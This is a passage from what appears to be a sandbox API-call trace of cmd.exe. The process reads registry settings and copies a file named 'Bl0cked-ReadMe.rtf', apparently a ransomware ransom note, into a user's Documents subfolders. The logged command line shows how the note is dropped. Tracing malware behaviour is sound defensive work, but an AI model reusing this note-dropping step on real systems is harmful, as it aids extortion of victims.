SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0127.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0127.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.773] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0127.773] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.773] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0127.773] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.773] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0127.774] _get_osfhandle (_FileHandle=0) returned 0x3 [0127.774] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0127.774] GetEnvironmentStringsW () returned 0x2f01d8* [0127.774] FreeEnvironmentStringsW (penv=0x2f01d8) returned 1 [0127.774] GetEnvironmentStringsW () returned 0x2f01d8* [0127.774] FreeEnvironmentStringsW (penv=0x2f01d8) returned 1 [0127.774] RegOpenKeyExW (in: hKey=0x80000002, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e7ac | out: phkResult=0x28e7ac*=0x40) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x0, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x1, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x1, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x0, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x40, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x40, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.774] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x40, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.774] RegCloseKey (hKey=0x40) returned 0x0 [0127.775] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, 
samDesired=0x2000000, phkResult=0x28e7ac | out: phkResult=0x28e7ac*=0x40) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x40, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x1, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x1, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x0, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x9, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x4, lpData=0x28e7b8*=0x9, lpcbData=0x28e7b0*=0x4) returned 0x0 [0127.775] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e7b4, lpData=0x28e7b8, lpcbData=0x28e7b0*=0x1000 | out: lpType=0x28e7b4*=0x0, lpData=0x28e7b8*=0x9, lpcbData=0x28e7b0*=0x1000) returned 0x2 [0127.775] RegCloseKey (hKey=0x40) returned 0x0 [0127.775] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886362 [0127.775] srand (_Seed=0x5b886362) [0127.775] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type 
\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0127.775] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"" [0127.775] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.775] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f1938, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0127.775] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0127.775] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0127.775] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.776] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0127.776] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0127.776] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0127.776] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0127.776] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0127.776] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0127.776] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0127.776] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0127.776] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0127.776] GetEnvironmentStringsW () returned 0x2f2328* [0127.776] 
FreeEnvironmentStringsW (penv=0x2f2328) returned 1 [0127.776] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.776] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0127.776] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0127.776] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0127.776] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0127.776] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0127.776] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0127.776] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0127.776] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0127.776] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0127.776] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f578 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.776] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x28f578, lpFilePart=0x28f574 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x28f574*="Desktop") returned 0x18 [0127.776] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.776] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f2f4 | out: lpFindFileData=0x28f2f4) returned 0x2f0068 [0127.777] FindClose (in: hFindFile=0x2f0068 | out: hFindFile=0x2f0068) returned 1 [0127.777] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x28f2f4 | out: lpFindFileData=0x28f2f4) returned 0x2f0068 [0127.777] FindClose (in: hFindFile=0x2f0068 | out: hFindFile=0x2f0068) returned 1 [0127.777] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x28f2f4 | out: lpFindFileData=0x28f2f4) returned 0x2f0068 [0127.777] FindClose (in: 
hFindFile=0x2f0068 | out: hFindFile=0x2f0068) returned 1 [0127.777] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0127.777] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0127.777] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0127.777] GetEnvironmentStringsW () returned 0x2f2b48* [0127.777] FreeEnvironmentStringsW (penv=0x2f2b48) returned 1 [0127.777] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.778] GetConsoleOutputCP () returned 0x1b5 [0127.778] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0127.778] GetUserDefaultLCID () returned 0x409 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f6b8, cchData=128 | out: lpLCData="0") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f6b8, cchData=128 | out: lpLCData="0") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f6b8, cchData=128 | out: lpLCData="1") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0127.778] GetLocaleInfoW 
(in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0127.778] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0127.779] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0127.779] GetConsoleTitleW (in: lpConsoleTitle=0x2e0918, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.779] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0127.779] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0127.780] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0127.780] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0127.780] _wcsicmp (_String1="type", _String2=")") returned 75 [0127.780] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0127.780] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0127.780] _wcsicmp (_String1="IF", _String2="type") returned -11 [0127.780] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0127.780] _wcsicmp (_String1="REM", _String2="type") returned -2 [0127.780] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0127.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.785] _get_osfhandle (_FileHandle=1) returned 0x7 [0127.785] GetFileType (hFile=0x7) returned 0x2 [0127.785] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0127.785] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x28f5b0 | 
out: lpMode=0x28f5b0) returned 1 [0127.785] _dup (_FileHandle=1) returned 3 [0127.785] _close (_FileHandle=1) returned 0 [0127.786] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0127.786] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x28f580, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0127.787] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0127.787] GetConsoleTitleW (in: lpConsoleTitle=0x28f3b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.787] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0127.787] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0127.787] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0127.787] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0127.788] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0127.788] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x28ef14, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x28ef14) returned 0x2e0ee0 [0127.788] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0127.788] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0127.788] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0127.788] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: 
"c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28de20, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0127.788] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0127.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.788] GetFileType (hFile=0x54) returned 0x1 [0127.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.789] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x28de78 | out: lpFileSizeHigh=0x28de78*=0x0) returned 0x1632 [0127.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.789] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.789] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.789] GetFileType (hFile=0x4c) returned 0x1 [0127.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.789] GetFileType (hFile=0x4c) returned 0x1 [0127.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.789] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.790] GetFileType (hFile=0x4c) returned 0x1 [0127.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.790] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 
0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.791] SetFilePointerEx (in: 
hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.791] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.791] GetFileType (hFile=0x4c) returned 0x1 [0127.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: 
lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28edf0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee40*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee40*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] WriteFile (in: hFile=0x4c, lpBuffer=0x28ee90*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ee90*, lpNumberOfBytesWritten=0x28de94*=0x20, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.792] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x28de80 | out: lpNewFilePointer=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=4) returned 0x54 [0127.792] ReadFile (in: hFile=0x54, lpBuffer=0x28ecb0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x28dea0, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesRead=0x28dea0*=0x200, lpOverlapped=0x0) returned 1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.792] GetFileType (hFile=0x4c) returned 0x1 [0127.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ecb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ecb0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed00*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28ed50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28ed50*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28eda0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x28de94, lpOverlapped=0x0 | out: lpBuffer=0x28eda0*, lpNumberOfBytesWritten=0x28de94*=0x50, lpOverlapped=0x0) returned 1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] GetFileType (hFile=0x4c) returned 0x1 [0127.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0127.793] WriteFile (in: hFile=0x4c, lpBuffer=0x28edf0*, nNumberOfBytesToWrite=0x50, 